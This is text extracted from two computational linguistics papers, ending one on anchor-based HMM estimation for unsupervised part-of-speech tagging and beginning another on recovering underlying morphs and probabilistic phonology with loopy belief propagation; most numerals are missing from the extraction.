table reports the log likelihood (normalized by the number of words) on the english portion for different estimation methods for hmms. bw and cluster obtain higher likelihood than the anchor algorithm, but this is expected given that both em and brown clustering directly optimize likelihood. in contrast, the anchor algorithm is based on the method of moments and does not (at least directly) optimize likelihood. note that high likelihood does not imply high accuracy under hmms.

related work

latent-variable models

there has recently been great progress in estimation of models with latent variables.
despite the np-hardness in general cases (terwijn, ; arora et al., ), many algorithms with strong theoretical guarantees have emerged under natural assumptions. for example, for hmms with full-rank conditions, hsu et al. ( ) derive a consistent estimator of the marginal distribution of observed sequences. anandkumar et al. ( ) propose an exact tensor decomposition method for learning a wide class of latent variable models with similar non-degeneracy conditions. arora et al. ( ) derive a provably correct learning algorithm for topic models with a certain parameter structure.

the anchor-based framework has been originally formulated for learning topic models (arora et al., ). it has been subsequently adopted to learn other models such as latent-variable probabilistic context-free grammars (cohen and collins, ). in our work, we have extended this framework to address unsupervised sequence labeling.

zhou et al. ( ) also extend arora et al. ( )'s framework to learn various models including hmms, but they address a more general problem. consequently, their algorithm draws from anandkumar et al. ( ) and is substantially different from ours.

[table: verifying model assumptions on the universal treebank (de, en, es, fr, id, it, ja, ko, pt-br, sv): the percentage of anchored tags and the percentage of unambiguous words per language. the anchor assumption is satisfied in every language. the brown assumption (each word has exactly one possible tag) is violated but not by a large margin. the lower table shows the most frequent anchor word and its count under each tag on the english portion.]

[table: log likelihood normalized by the number of words on english (along with accuracy) for bw, cluster, anchor, and anchor-features. for bw, we report the mean of random restarts run for , iterations.]

unsupervised pos tagging

unsupervised pos tagging is a classic problem in unsupervised learning that has been tackled with various approaches. johnson ( ) observes that em performs poorly in this task because it induces flat distributions; this is not the case with our algorithm, as seen in the peaky distributions in table . haghighi and klein ( ) assume a set of prototypical words for each tag and report high accuracy. in contrast, our algorithm automatically finds such prototypes in a subroutine.

berg-kirkpatrick et al. ( ) achieve the state-of-the-art result in unsupervised fine-grained pos tagging (mid- %). as described in section . , their model is an hmm in which probabilities are given by log-linear models. table provides a point of reference comparing our work with berg-kirkpatrick et al. ( ) in their setting: models are trained and tested on the entire -tag wsj dataset. their model outperforms our approach in this setting: with fine-grained tags, spelling features become more important, for instance to distinguish "played" (vbd) from "play" (vbz). nonetheless, we have shown that our approach is competitive when universal tags are used (table ).

[table: many-to-one accuracy on the english data with original tags, for bw, cluster, anchor, anchor-features, and log-linear. we use the same setting as in table . for bw and log-linear, we report the mean and the standard deviation (in parentheses) of random restarts run for , iterations.]

many past works on pos induction predate the introduction of the universal tagset by petrov et al. ( ) and thus report results with fine-grained tags. more recent works adopt the universal tagset but
they leverage additional resources. for instance, das and petrov ( ) and täckström et al. ( ) use parallel data to project pos tags from a supervised source language. li et al. ( ) use tag dictionaries built from wiktionary. thus their results are not directly comparable to ours. (das and petrov ( ) conduct unsupervised experiments using the model of berg-kirkpatrick et al. ( ), but their dataset and evaluation method differ from ours.)

conclusion

we have presented an exact estimation method for learning anchor hmms from unlabeled data. there are several directions for future work. an important direction is to extend the method to a richer family of models such as log-linear models or neural networks. another direction is to further generalize the method to handle a wider class of hmms by relaxing the anchor condition (condition . ). this will require a significant extension of the nmf algorithm in figure .

acknowledgments

we thank taylor berg-kirkpatrick for providing the implementation of berg-kirkpatrick et al. ( ). we also thank anonymous reviewers for their constructive comments.

references

animashree anandkumar, daniel hsu, and sham m. kakade. a method of moments for mixture models and hidden markov models. in twenty-fifth annual conference on learning theory.

animashree anandkumar, rong ge, daniel hsu, sham m. kakade, and matus telgarsky. tensor decompositions for learning latent variable models. journal of machine learning research.

sanjeev arora, rong ge, and ankur moitra. learning topic models – going beyond svd. in foundations of computer science (focs), ieee annual symposium on. ieee.

sanjeev arora, rong ge, yonatan halpern, david mimno, ankur moitra, david sontag, yichen wu, and michael zhu. a practical algorithm for topic modeling with provable guarantees. in proceedings of the international conference on machine learning (icml).

leonard e. baum and ted petrie. statistical inference for probabilistic functions of finite state markov chains. the annals of mathematical statistics.

taylor berg-kirkpatrick, alexandre bouchard-côté, john denero, and dan klein. painless unsupervised learning with features. in human language technologies: the annual conference of the north american chapter of the association for computational linguistics. association for computational linguistics.

peter f. brown, peter v. desouza, robert l. mercer, vincent j. della pietra, and jenifer c. lai. class-based n-gram models of natural language. computational linguistics.

christos christodoulopoulos, sharon goldwater, and mark steedman. two decades of unsupervised pos induction: how far have we come? in proceedings of the conference on empirical methods in natural language processing. association for computational linguistics.

shay b. cohen and michael collins. a provably correct learning algorithm for latent-variable pcfgs. in proceedings of acl.

dipanjan das and slav petrov. unsupervised part-of-speech tagging with bilingual graph-based projections. in proceedings of the annual meeting of the association for computational linguistics: human language technologies. association for computational linguistics.

marguerite frank and philip wolfe. an algorithm for quadratic programming. naval research logistics quarterly.
aria haghighi and dan klein. . prototype-driven learning for sequence models. in proceedings of the main conference on human language technol- ogy conference of the north american chapter of the association of computational linguistics, pages – . association for computational linguistics. daniel hsu, sham m. kakade, and tong zhang. . a spectral algorithm for learning hidden markov mod- els. journal of computer and system sciences, ( ): – . mark johnson. . why doesn’t em find good hmm pos-taggers? in emnlp-conll, pages – . shen li, joao v. graça, and ben taskar. . wiki- ly supervised part-of-speech tagging. in proceedings of the joint conference on empirical methods in natural language processing and computational natural language learning, pages – . asso- ciation for computational linguistics. percy liang and dan klein. . analyzing the errors of unsupervised learning. in acl, pages – . percy liang. . semi-supervised learning for natural language. master’s thesis, massachusetts institute of technology. ryan t. mcdonald, joakim nivre, yvonne quirmbach- brundage, yoav goldberg, dipanjan das, kuzman ganchev, keith b. hall, slav petrov, hao zhang, os- car täckström, claudia bedini, núria b. castelló, and jungmee lee. . universal dependency annota- tion for multilingual parsing. in acl, pages – . bernard merialdo. . tagging english text with a probabilistic model. computational linguistics, ( ): – . slav petrov, dipanjan das, and ryan mcdonald. . a universal part-of-speech tagset. in proceedings of the eighth international conference on language re- sources and evaluation (lrec’ ). noah a. smith and jason eisner. a. contrastive estimation: training log-linear models on unlabeled data. in proceedings of the rd annual meeting on association for computational linguistics, pages – . association for computational linguistics. noah a. smith and jason eisner. b. guiding un- supervised grammar induction using contrastive esti- mation. in proc. of ijcai workshop on grammatical inference applications, pages – . karl stratos, do-kyum kim, michael collins, and daniel hsu. . a spectral algorithm for learning class- based n-gram models of natural language. in proceed- ings of the thirtieth conference on uncertainty in arti- ficial intelligence. karl stratos, michael collins, and daniel hsu. . model-based word embeddings from decompositions of count matrices. in proceedings of the rd annual meeting of the association for computational linguis- tics and the th international joint conference on nat- ural language processing (volume : long papers), pages – , beijing, china, july. association for computational linguistics. oscar täckström, dipanjan das, slav petrov, ryan mc- donald, and joakim nivre. . token and type constraints for cross-lingual part-of-speech tagging. transactions of the association for computational linguistics, : – . sebastiaan a. terwijn. . on the learnability of hid- den markov models. in grammatical inference: al- gorithms and applications, pages – . springer. kristina toutanova and mark johnson. . a bayesian lda-based model for semi-supervised part- of-speech tagging. in advances in neural information processing systems, pages – . stephen a. vavasis. . on the complexity of nonneg- ative matrix factorization. siam journal on optimiza- tion, ( ): – . tianyi zhou, jeff a. bilmes, and carlos guestrin. . divide-and-conquer learning by anchoring a conical hull. in advances in neural information processing systems, pages – . 
modeling word forms using latent underlying morphs and phonology ryan cotterell and nanyun peng and jason eisner department of computer science, johns hopkins university {ryan.cotterell,npeng ,eisner}@jhu.edu abstract the observed pronunciations or spellings of words are often explained as arising from the “underlying forms” of their mor- phemes. these forms are latent strings that linguists try to reconstruct by hand. we propose to reconstruct them automatically at scale, enabling generalization to new words. given some surface word types of a concatenative language along with the abstract morpheme sequences that they ex- press, we show how to recover consistent underlying forms for these morphemes, together with the (stochastic) phonology that maps each concatenation of underly- ing forms to a surface form. our technique involves loopy belief propagation in a nat- ural directed graphical model whose vari- ables are unknown strings and whose con- ditional distributions are encoded as finite- state machines with trainable weights. we define training and evaluation paradigms for the task of surface word prediction, and report results on subsets of languages. introduction how is plurality expressed in english? compar- ing cats ([kæts]), dogs ([dogz]), and quizzes ([kwiziz]), the plural morpheme evidently has at least three pronunciations ([s], [z], [iz]) and at least two spellings (-s and -es). also, consider- ing singular quiz, perhaps the “short exam” mor- pheme has multiple spellings (quizz-, quiz-). fortunately, languages are systematic. the re- alization of a morpheme may vary by context but is largely predictable from context, in a way that generalizes across morphemes. in fact, gener- ative linguists traditionally posit that each mor- pheme of a language has a single representation shared across all contexts (jakobson, ; ken- stowicz and kisseberth, , chapter ). how- ever, this string is a latent variable that is never observed. variation appears when the phonology of the language maps these underlying represen- tations (urs)—in context—to surface represen- tations (srs) that may be easier to pronounce. the phonology is usually described by a grammar that may consist of either rewrite rules (chomsky and halle, ) or ranked constraints (prince and smolensky, ). we will review this framework in section . the upshot is that the observed words in a language are supposed to be explainable in terms of a smaller underlying lexicon of morphemes, plus a phonol- ogy. our goal in this paper is to recover the lexicon and phonology (enabling generalization to new words). this is difficult even when we are told which morphemes are expressed by each word, be- cause the unknown underlying forms of the mor- phemes must cooperate properly with one another and with the unknown phonological rules to pro- duce the observed results. because of these in- teractions, we must reconstruct everything jointly. we regard this as a problem of inference in a di- rected graphical model, as sketched in figure . this is a natural problem for computational lin- guistics. phonology students are trained to puzzle out solutions for small datasets by hand. children apparently solve it at the scale of an entire lan- guage. phonologists would like to have grammars for many languages, not just to study each lan- guage but also to understand universal principles and differences among related languages. auto- matic procedures would recover such grammars. 
they would also allow comprehensive evaluation and comparison of different phonological theories (i.e., what inductive biases are useful?), and would suggest models of human language learning.

solving this problem is also practically important for nlp. what we recover is a model that can generate and help analyze novel word forms, which abound in morphologically complex languages. (an analyzer would require a prior over possible analyses. our present model defines just the corresponding likelihoods, i.e., the probability of the observed word given each analysis.) our approach is designed to model surface pronunciations (as needed for text-to-speech and asr). it might also be applied in practice to model surface spellings (as needed for mt on text). good morphological analysis has been used to improve nlp tasks such as machine translation, parsing, and ner (fraser et al., ; hohensee and bender, ; yeniterzi, ).

[figure: our model as a bayesian network, in which surface forms arise from applying phonology to a concatenation of underlying forms. shaded nodes show the observed surface forms for four words: resignation, resigns, damns, and damnation. the graphical model encodes their morphological relationships using latent forms. each morpheme ur at layer 1 is generated by the lexicon model mφ (a probabilistic finite-state automaton). these are concatenated into various word urs at layer 2. each sr at layer 3 is generated using the phonology model sθ (a probabilistic finite-state transducer). layer 4 derives observable phonetic forms from layer 3: this deletes unpronounced symbols such as syllable boundaries, and translates the phonemes into an observed phonetic, articulatory, or acoustic representation. however, our present paper simply merges layers 3 and 4: our layer 3 does not currently make use of any unpronounced symbols (e.g., syllable boundaries) and we observe it directly.]

using loopy belief propagation, this paper attacks larger-scale learning problems than prior work on this task (section ). we also develop a new evaluation paradigm that examines how well an inferred grammar predicts held-out srs. unlike previous algorithms, we do not pre-restrict the possible urs for each morpheme to a small or structured finite set, but use weighted finite-state machines to reason about the infinite space of all strings. our graphical model captures the standard assumption that each morpheme has a single ur, unlike some probabilistic learners. however, we do not try to learn traditional ordered rules or constraint rankings like previous methods. we just search directly for a probabilistic finite-state transducer that captures likely ur-to-sr mappings.

formal framework

we urge the reader to begin by examining figure , which summarizes our modeling approach through an example. the upcoming sections then give a formal treatment with details and discussion. section describes the random variables in figure 's bayesian network, while section describes its conditional probability distributions. sections – give inference and learning methods.

a morpheme is a lexical entry that pairs form with content (saussure, ). its form is a morph—a string of phonemes.
its content is a bundle of syntactic and/or semantic properties. (this paper does not deal with the content. however, note that a single morpheme might specify a conjunction or disjunction of multiple properties, leading to morphological phenomena such as fusion, suppletion, or syncretism.) note that in this paper, we are nonstandardly using "morph" to denote an underlying form. we assume that all underlying and surface representations can be encoded as strings, over respective alphabets Σu and Σs. this would be possible even for autosegmental representations (kornai, ).

a language's phonological system thus consists of the following components. we denote each important set by a calligraphic letter. we use the corresponding uppercase letter to denote a function to that set, the corresponding lowercase letter as a variable that ranges over the set's elements, and a distinguished typeface for specific elements.

• a is a set of abstract morphemes such as QUIZ and PLURAL. these are atoms, not strings.
• m = Σu∗ is the space of possible morphs: concrete ur strings such as /kwiz/ or /z/.
• m : a → m is the lexicon that maps each morpheme a to an underlying morph m = m(a). we will find m(a) for each a.
• u = (Σu ∪ {#})∗ is the space of underlying representations for words, such as /kwiz#z/.
• u : m∗ → u combines morphs. a word is specified by a sequence of morphemes ~a = a1, a2, . . ., with concrete forms mi = m(ai). that word's underlying form is then u = u(m1, m2, . . .) ∈ u.
• s = Σs∗ is the space of surface representations for words, such as [kwiziz].
• s : u → s is the phonology. it maps an underlying form u to its surface form s. we will find this function s along with m.

we assume in this paper that u simply concatenates the sequence of morphs, separating them by the morph boundary symbol #: u = u(m1, m2, . . .) = m1#m2# · · · . however, see section . for generalizations.

the overall system serves to map an (abstract) morpheme sequence ~a ∈ a∗ to a surface word s ∈ s. crucially, s acts on the underlying form u of the entire word, not one morph at a time. hence its effect on a morph may depend on context, as we saw for english pluralization. for example, s(/kwiz#s/) = [kwiziz]—or if we were to apply our model to orthography, s(/quiz#s/) = [quizzes]. s produces a single well-formed surface form, which is not arbitrarily segmented as [quiz-zes] or [quizz-es] or [quizze-s].

probability model

our goal is to reconstruct the lexicon m and morphophonology s for a given language. we therefore define prior probability distributions over them. (we assume Σu, Σs, a, u are given.)

for each morpheme a ∈ a, we model the morph m(a) ∈ m as an iid sample from a probability distribution mφ(m). this model describes what sort of underlying forms appear in the language's lexicon.

the phonology is probabilistic in a similar way. for a word with underlying form u ∈ u, we presume that the surface form s(u) is a sample from a conditional distribution sθ(s | u). this single sample appears in the lexical entry of the word type and is reused for all tokens of that word.

the parameter vectors φ and θ are specific to the language being generated. thus, under our generative story, a language is created as follows:

1. sample φ and θ from priors (see section . ).
2. for each a ∈ a, sample m(a) ∼ mφ. (see section . for a generalization to mφ(m | a).)
3. whenever a new abstract word ~a = a1, a2, · · · must be pronounced for the first time, construct u as described in section , and sample s(u) ∼ sθ(· | u). reuse this s(u) in future.
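a toy sampler for this three-step generative story follows. it is illustrative only: the lexicon model matches the simple one introduced later (uniform phonemes, geometric length), while the stand-in "phonology" just copies or deletes phonemes rather than using the trained contextual edit model.

```python
# Toy sampler for the generative story above (illustrative names throughout).
import random

SIGMA_U = list("ptkbdgmnszlraeiou")      # toy underlying alphabet

def sample_morph(phi=0.2, rng=random):
    """Step 2: draw an underlying morph (geometric length, uniform phonemes)."""
    m = ""
    while rng.random() > phi:            # halt after each symbol with probability phi
        m += rng.choice(SIGMA_U)
    return m

def sample_surface(u, copy_prob=0.9, rng=random):
    """Stand-in for S_theta(. | u): independently copy or delete each phoneme."""
    return "".join(c for c in u.replace("#", "") if rng.random() < copy_prob)

def sample_language(morphemes, abstract_words, phi=0.2, rng=random):
    lexicon = {a: sample_morph(phi, rng) for a in morphemes}         # step 2
    surface = {}
    for word in abstract_words:                                      # step 3
        if word not in surface:                                      # reuse s(u)
            u = "#".join(lexicon[a] for a in word)
            surface[word] = sample_surface(u, rng=rng)
    return lexicon, surface

lex, srs = sample_language({"DAMN", "PLURAL"}, [("DAMN",), ("DAMN", "PLURAL")])
print(lex, srs)
```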
note that we have not specified a probability distribution over abstract words ~a, since in this paper, these sequences will always be observed. such a distribution might be influenced by the semantic and syntactic content of the morphemes. we would need it to recover the abstract words if they were unobserved, e.g., when analyzing novel word forms or attempting unsupervised training.

discussion: why probability?

a language's lexicon m and morphophonology s are deterministic, in that each morpheme has a single underlying form and each word has a single surface form. the point of the language-specific distributions mφ and sθ is to aid recovery of these forms by capturing regularities in m and s.

in particular, sθ constitutes a theory of the regular phonology of the language. its high-probability sound changes are the "regular" ones, while irregularities and exceptions can be explained as occasional lower-probability choices. we prefer a theory sθ that has high likelihood, i.e., it assigns high probability (≈ 1) to each observed form s given its underlying u. in linguistic terms, we prefer predictive theories that require few exceptions.

in the linguistic community, the primary motivation for probabilistic models of phonology (pierrehumbert, ) has been to explain "soft" phenomena: synchronic variation (sankoff, ; boersma and hayes, ) or graded acceptability judgments on novel surface forms (hayes and wilson, ). these applications are orthogonal to our motivation, as we do not observe any variation or gradience in our present experiments. fundamentally, we use probabilities to measure irregularity—which simply means unpredictability and is a matter of degree. our objective function will quantitatively favor explanations that show greater regularity (eisner, b).

a probabilistic treatment also allows relatively simple learning methods (e.g., boersma and hayes ( )) since inference never has to backtrack from a contradiction. our method searches a continuous space of phonologies sθ, all of which are consistent with every mapping s. that is, we always have sθ(s | u) > 0 for all u, s, so our current guess of sθ is always capable of explaining the observed words, albeit perhaps with low probability. our em learner tunes sθ (and mφ) so as to raise the probability of the observed surface forms, marginalizing over the reconstructed lexicon m of underlying forms. we do warn that em can get stuck at a local optimum; random restarts and simulated annealing are ways to escape such low-likelihood solutions, much as backtracking escapes zero-likelihood solutions.

[figure: illustration of a contextual edit process as it pronounces the english word wetter by transducing the underlying /wet#@r/ (after erasing #) to the surface [wer@r]. at the point shown, it is applying the "intervocalic alveolar flapping" rule, replacing /t/ in this context by applying subst(r).]

mapping urs to srs: the phonology sθ

we currently model sθ(s | u) as the probability that a left-to-right stochastic contextual edit process (figure ) would edit u into s. this probability is a sum over all edit sequences that produce s from u—that is, all s-to-u alignments.

stochastic contextual edit processes were described by cotterell et al. ( ).
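the next paragraphs spell out that edit process. as a preview, here is a toy dynamic program that sums over all edit sequences aligning u to s. it uses fixed, context-independent edit probabilities purely for illustration, whereas the actual model makes each choice with a context-dependent log-linear distribution and computes this sum with a weighted finite-state transducer.

```python
# Toy version of s_theta(s | u): sum over all left-to-right edit sequences
# (alignments) that rewrite u as s.  Edit probabilities are constants here.
from functools import lru_cache

def edit_model_prob(u, s, p_copy=0.80, p_sub=0.02, p_del=0.05, p_ins=0.01, p_halt=0.90):
    u = u.replace("#", "")               # boundaries are erased before editing
    @lru_cache(maxsize=None)
    def prob(i, j):                      # i phonemes of u consumed, j of s emitted
        total = 0.0
        if i == len(u) and j == len(s):
            total += p_halt                                        # halt
        if i < len(u) and j < len(s):                              # subst(c) / copy
            total += (p_copy if u[i] == s[j] else p_sub) * prob(i + 1, j + 1)
        if i < len(u):                                             # delete
            total += p_del * prob(i + 1, j)
        if j < len(s):                                             # insert(c)
            total += p_ins * prob(i, j + 1)
        return total
    return prob(0, 0)

# e.g. a faithful pronunciation scores higher than one requiring a deletion:
print(edit_model_prob("kwiz#iz", "kwiziz"), edit_model_prob("kwiz#iz", "kwizz"))
```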
such a pro- cess writes surface string s ∈ Σ∗s while reading the underlying string u ∈ Σ∗u . if the process has so far consumed some prefix of the input and pro- duced some prefix of the output, it will next make a stochastic choice among |Σs| + possible ed- its. edits of the form subst(c) or insert(c) (for c ∈ Σs) append c to the output string. edits of the form subst(c) or delete will (also) consume the next input phoneme; if no input phonemes remain, the only possible edits are insert(c) or halt. the stochastic choice of edit, given context, is governed by a conditional log-linear distribution with feature weight vector θ. the feature functions may look at a bounded amount of left and right input context, as well as left output context. our feature functions are described in section . our normalized probabilities sθ(s | u) can be computed by a weighted finite-state transducer, a crucial computational property that we will ex- ploit in section . . as cotterell et al. ( ) explain, the price is that our model is left/right- asymmetric. the inability to condition directly on the right output context arises from local normal- ization, just like “label bias” in maximum entropy markov models (mccallum et al., ). with certain fancier approaches to modeling sθ, which we leave to future work, this effect could be miti- gated while preserving the transducer property. . generating urs: the lexicon model mφ in our present experiments, we use a very simple lexicon model mφ, so that the burden falls on the phonology sθ to account for any language-specific regularities in surface forms. this corresponds to the “richness of the base” principle advocated by some phonologists (prince and smolensky, ), and seems to yield good generalization for us. we say all urs of the same length have the same probability, and the length is geometrically dis- tributed with mean ( /φ) − . this is a -gram model with a single parameter φ ∈ ( , ], namely mφ(m) = (( −φ)/|Σu|)|m| ·φ. it would be straightforward to experiment with other divisions of labor between the lexicon model and phonology model. a -gram model for mφ would also model which underlying phonemes are common in the lexicon. a -gram model would model the “underlying phonotactics” of morphs, though phonological processes would still be needed at morph boundaries. such models are the probabilistic analogue of morpheme struc- ture constraints. we could further generalize from mφ(m) to mφ(m | a), to allow the shape of the morph m to be influenced by a’s content. for example, mφ(m | a) for english might describe how nouns tend to have underlying stress on the first syllable; similarly, mφ(m | a) for arabic might capture the fact that underlying stems tend to consist of consonants; and across languages, mφ(m | a) would prefer affixes to be short. note that we will always learn a language’s mφ jointly with its actual lexicon m. loosely speak- ing, the parameter vector φ is found from easily reconstructed urs in m; then mφ serves as a prior that can help us reconstruct more difficult urs. . prior over the parameters for φ, which is a scalar under our -gram model, our prior is uniform over ( , ]. we place a spher- ical gaussian prior on the vector θ, with mean ~ and a variance σ tuned by coarse grid search on dev data (see captions of figures – ). the gaussian favors phonologies that are sim- ple in the sense that they have few strongly weighted features. 
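written out directly, the two priors just described look as follows. the code is illustrative (invented names), and the gaussian log-density is shown up to an additive constant.

```python
# The lexicon prior M_phi and the Gaussian prior over the phonology weights.
import numpy as np

def log_m_phi(morph, alphabet_size, phi):
    """log M_phi(m) for the simple lexicon model: uniform phonemes and a
    geometric length distribution with mean 1/phi - 1."""
    return len(morph) * np.log((1.0 - phi) / alphabet_size) + np.log(phi)

def log_theta_prior(theta, sigma):
    """Spherical Gaussian over the phonology feature weights (mean 0)."""
    return -np.sum(np.asarray(theta) ** 2) / (2.0 * sigma ** 2)

print(log_m_phi("kwiz", alphabet_size=30, phi=0.2))
print(log_theta_prior([0.5, -1.0, 0.0], sigma=1.0))
```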
a grammar that refers once to the natural class of voiced consonants (section ), which captures a generalization, is preferred to an equally descriptive grammar that refers separately to several specific voiced consonants. if it is hard to tell whether a change applies to round or back vowels (because these properties are strongly cor- related in the training data), then the prior resists grammars that make an arbitrary choice. it prefers to “spread the blame” by giving half the weight to each feature. the change is still probable for round back vowels, and moderately probable for other vowels that are either round or back. inference we are given a training set of surface word forms s that realize known abstract words ~a. we aim to reconstruct the underlying morphs m and words u, and predict new surface word forms s. . a bayesian network for fixed θ and φ, this task can be regarded as marginal inference in a bayesian network (pearl, ). figure displays part of a network that en- codes the modeling assumptions of section . the nodes at layers , , and of this network repre- sent string-valued random variables in m, u, and s respectively. each variable’s distribution is con- ditioned on the values of its parents, if any. in particular, layer represents the unknown m(a) for various a. notice that each m(a) is softly constrained by the prior mφ, and also by the fact that it must help produce various observed surface words via sθ. each underlying word u at level is a concate- nation of its underlying morphs m(ai) at level . thus, the topology at levels – is given by super- vision. we would have to learn this topology if the word’s morphemes ai were not known. our approach captures the unbounded genera- tive capacity of language. in contrast to dreyer and eisner ( ) (see section ), we have defined a directed graphical model. hence new unob- served descendants can be added without chang- ing the posterior distribution over the existing vari- ables. so our finite network can be viewed as a subgraph of an infinite graph. that is, we make no closed-vocabulary assumption, but implicitly in- clude (and predict the surface forms of) any un- observed words that could result from combining morphemes, even morphemes not in our dataset. while the present paper focuses on word types, we could extend the model to consider tokens as well. in figure , each phonological surface type at layer could be observed to generate or more noisy phonetic tokens at layer , in contexts that call for the morphemes expressed by that type. . loopy belief propagation the top two layers of figure include a long undirected cycle (involving all nodes and all edges shown). on such “loopy” graphical models, exact inference is in general uncomputable when the random variables are string-valued. however, dreyer and eisner ( ) showed how to substi- tute a popular approximate joint inference method, loopy belief propagation (murphy et al., ). qualitatively, what does this do on figure ? let u denote the leftmost layer- node. midway through loopy bp, u is not yet sure of its value, but is receiving suggestions from its neighbors. the stem ur immediately above u would like u to start with something like /rizajgn#/. meanwhile, the word sr immediately below u encourages u to be any ur that would have a high probability (under sθ) of surfacing as [rezign#eis@n]. 
so u tries to meet both requirements, guessing that its value might be something like /rizajgn#eis@n/ (the product of this string’s scores under the two mes- sages to u is relatively high). now, for u to have produced something like /rizajgn#eis@n/ by stem- suffix concatenation, the suffix’s ur must have been something like /eis@n/. u sends a message saying so to the third node in layer . this induces that node (the suffix ur) to inform the rightmost layer- node that it probably ends in /#eis@n/ as well—and so forth, iterating until convergence. formally, the loopy bp algorithm iteratively updates messages and beliefs. each is a func- tion that scores possible strings (or string tuples). dreyer and eisner ( )’s key insight is that these messages and beliefs can be represented using weighted finite-state machines (wfsms), and fur- thermore, loopy bp can compute all of its updates using standard polytime finite-state constructions. . discussion: the finite-state requirement the above results hold when the “factors” that de- fine the graphical model are themselves expressed loopy bp actually passes messages on a factor graph de- rived from figure . however, in this informal paragraph we will speak as if it were passing messages on figure directly. because that stem ur thinks its own value is something like /rizajgn/—based on the messages that it is currently re- ceiving from related forms such as /rizajgn#z/, and from mφ. as wfsms. this is true in our model. the fac- tors of section . correspond to the conditional distributions mφ, u, and sθ that respectively se- lect values for nodes at layers , , and given the values at their parents. as section models these, for any φ and θ, we can represent mφ as a -tape wfsm (acceptor), u as a multi-tape wfsm, and sθ as a -tape wfsm (transducer). any other wfsms could be substituted. we are on rather firm ground in restricting to finite-state (regular) models of sθ. the apparent regularity of natural-language phonology was first observed by johnson ( ), so computational phonology has generally preferred grammar formalisms that compile into (unweighted) finite-state machines, whether the formalism is based on rewrite rules (kaplan and kay, ) or constraints (eisner, a; riggle, ). similarly, u could be any multi-tape finite-state relation, not just concatenation as assumed in sec- tion . this would allow our framework to handle templatic morphology (hulden, ), infixation, or circumfixation. although only regular factors are allowed in our graphical model, a loopy graphical model with multiple such factors can actually capture non- regular phenomena, for example by using auxil- iary variables (dreyer and eisner, , § . ). ap- proximate inference then proceeds by loopy bp on this model. in particular, reduplication is not reg- ular if unbounded, but we can adopt morphologi- cal doubling theory (inkelas and zoll, ) and model it by having u concatenate two copies of the same morph. during inference of urs, this morph exchanges messages with two substrings of the underlying word. mφ has a single state, with halt probability φ and the remaining probability − φ divided among self-loop arcs labeled with the phonemes in Σu. u must concatenate k morphs by copying all of tape , then tape , etc., to tape k + : this is easily done using k + states, and arcs of probability . sθ is constructed as in cotterell et al. ( ). in general, a u factor enforces u = u(m , . . . 
,mk), so it is a degree-(k + ) factor, represented by a (k + )- tape wfsm connecting these variables (dreyer and eis- ner, ). if one’s finite-state library is limited to - tape wfsms, then one can simulate the u factor us- ing ( ) an auxiliary string variable π encoding the path through u, ( ) a unary factor weighting π according to u, ( ) a set of binary factors relating π to each of u,m , . . . ,mk. the standard case u = m # . . . #mk can be handled more easily. given factor u’s incoming mes- sages µ·→u , each being a -tape wfsm, compute its loopy bp outgoing messages µu→u = µm →u # · · ·#µmk→u and (e.g.) µu→m = range(µu→u ◦ ((µm →u # × �) Σ∗u (#µm →u # · · ·#µmk→u × �))). similarly, we can manipulate the graphical model structure to encode cyclic phonology—i.e., concatenating a word sr with a derivational affix ur and passing the result through sθ once again. an alternative is to encode this hierarchical struc- ture into the word ur u, by encoding level- and level- boundaries with different symbols. a sin- gle application of sθ can treat these boundaries differently: for example, by implementing cyclic phonology as a composition of two transductions. . loopy bp implementation details each loopy bp message to or from a random variable is a -tape wfsm (acceptor) that scores all possible values of that variable (given by the set m, u, or s: see section ). we initialized each message to the uniform distribution. we then updated the messages serially, alternating be- tween upward and downward sweeps through the bayesian network. after iterations we stopped and computed the final belief at each variable. a complication is that a popular affix such as /z/ (in layer ) receives messages from hundreds of words that realize that affix. loopy bp obtains that affix’s belief and outgoing messages by intersect- ing all these wfsms—which can lead to astro- nomically large results and runtimes. we address this for now with a simple pruning approximation where at each variable m, we dynamically restrict to a finite support set of plausible values for m. we take this to be the union of the -best lists of all messages sent to m. we modify those mes- sages so that strings in m’s support set have un- changed weight, but all other strings have weight . as a result, m’s outgoing messages and belief are also confined to its support set. note that the support set is not hand-specified, but determined automatically by taking the best hypotheses under the probability model. improved approaches with no pruning are pos- sible. after submitting this paper, we devel- oped a penalized expectation propagation method (cotterell and eisner, ). it approximates the messages using log-linear functions (based on variable-order n-gram features) whose support is the entire space Σ∗ . we also developed a dual this is standard—although the uniform distribution over the space of strings is actually an improper distribution. it is expressed by a single-state wfsm whose arcs have weight . in general, we should update this support set dynami- cally as inference and learning improve the messages. but in our present experiments, that appears unnecessary, since the initial support set always appears to contain the “correct” ur. decomposition method (peng et al., ), which if it converges, exactly recovers the single most probable explanation of the data given φ and θ. parameter learning we employ map-em as the learning algorithm. the e-step is approximated by the loopy bp algo- rithm of section . 
the m-step takes the resulting beliefs, together with the prior of section . , and uses them to reestimate the parameters θ and φ. if we knew the true ur uk for each observed word type sk, we would just do supervised training of θ, using l-bfgs (liu and nocedal, ) to locally maximize θ’s posterior log-probability ( ∑ k log sθ(sk | uk)) + log pprior(θ) cotterell et al. ( ) give the natural dynamic programming algorithm to compute each sum- mand and its gradient w.r.t. θ. the gradient is the difference between observed and expected feature vectors of the contextual edits (section . ), aver- aged over edit contexts in proportion to how many times those contexts were likely encountered. the latent alignment makes the objective non-concave. in our em setting, uk is not known. so our m- step replaces log sθ(sk | uk) with its expectation,∑ uk bk(uk) log sθ(sk | uk), where bk is the nor- malized belief about uk computed by the previ- ous e-step. since bk and sθ are both represented by wfsms (with and tapes respectively), it is possible to compute this quantity and its gradient exactly, using finite-state composition in a second- order expectation semiring (li and eisner, ). for speed, however, we currently prune bk back to the -best values of uk. this lets us use a sim- pler and faster approach: a weighted average over runs of the cotterell et al. ( ) algorithm. our asymptotic runtime benefits from the fact that our graphical model is directed (so our objec- tive does not have to contrast with all other values of uk) and the fact that sθ is locally normalized (so our objective does not have to contrast with all other values of sk for each uk). in practice we are far faster than dreyer and eisner ( ). we initialized the parameter vector θ to ~ , ex- cept for setting the weight of the copy feature (section ) such that the probability of a copy edit is . in every context other than end-of-string. this encourages urs to resemble their srs. that is, a lexicon of morphs together with contextual edit sequences that will produce the observed word srs. bigram(strident,strident) adjacent surface stridents bigram(�,uvular) surface uvular edit([s],[z]) /s/ became [z] edit(coronal,labial) coronal became labial edit(�, phoneme) phoneme was inserted edit(consonant,�) consonant was deleted table : examples of markedness and faithfulness features that fire in our model. they have a natural interpretation as optimality-theoretic constraints. � denotes the empty string. the natural classes were adapted from (riggle, ). to reestimate φ, the m-step does not need to use l-bfgs, for section . ’s simple model of mφ and uniform prior over φ ∈ ( , ]. it simply sets φ = /(` + ) where ` is the average 